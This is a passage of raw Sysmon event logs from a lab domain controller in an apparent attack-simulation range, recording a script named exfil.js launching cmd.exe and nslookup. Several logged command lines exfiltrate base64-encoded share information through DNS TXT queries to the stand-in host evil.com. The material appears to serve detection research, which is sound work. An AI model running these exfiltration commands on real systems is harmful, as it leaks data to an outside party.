dll+51791 10341000x8000000000000000200525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.895{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.895{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.895{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.895{2E1864BB-17BF-629A-7D40-000000005F02}47282932C:\Windows\system32\cmd.exe{2E1864BB-17BF-629A-7F40-000000005F02}8132C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.897{2E1864BB-17BF-629A-7F40-000000005F02}8132C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BF-629A-7D40-000000005F02}4728C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljzvjy.tmp 2>&1 10341000x8000000000000000200520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.864{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-7E40-000000005F02}5588C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.864{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-7E40-000000005F02}5588C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.864{2E1864BB-17BF-629A-7E40-000000005F02}55886396C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-7D40-000000005F02}4728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.848{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-7E40-000000005F02}5588C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.848{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.848{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.848{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.848{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.848{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-7D40-000000005F02}4728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.848{2E1864BB-17A1-629A-783D-000000005F02}55527248C:\Windows\System32\WScript.exe{2E1864BB-17BF-629A-7D40-000000005F02}4728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.851{2E1864BB-17BF-629A-7D40-000000005F02}4728C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljzvjy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.833{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldnawh.tmpMD5=C7EBA965EA2938C9D738B256A5573F35,SHA256=722A438985A6A7CB05BECB0E5BC6B8755AA777F6146D0E8D8A702198A5DDD2AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.817{2E1864BB-17BF-629A-7B40-000000005F02}48605948C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-7C40-000000005F02}6892C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.817{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-7C40-000000005F02}6892C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.817{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.817{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.817{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.817{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.817{2E1864BB-17BF-629A-7A40-000000005F02}73847948C:\Windows\system32\cmd.exe{2E1864BB-17BF-629A-7C40-000000005F02}6892C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.819{2E1864BB-17BF-629A-7C40-000000005F02}6892C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BF-629A-7A40-000000005F02}7384C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldnawh.tmp 2>&1 10341000x8000000000000000200500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.779{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-7B40-000000005F02}4860C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.779{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-7B40-000000005F02}4860C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.779{2E1864BB-17BF-629A-7B40-000000005F02}48605948C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-7A40-000000005F02}7384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.748{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-7B40-000000005F02}4860C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.748{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-7A40-000000005F02}7384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.748{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 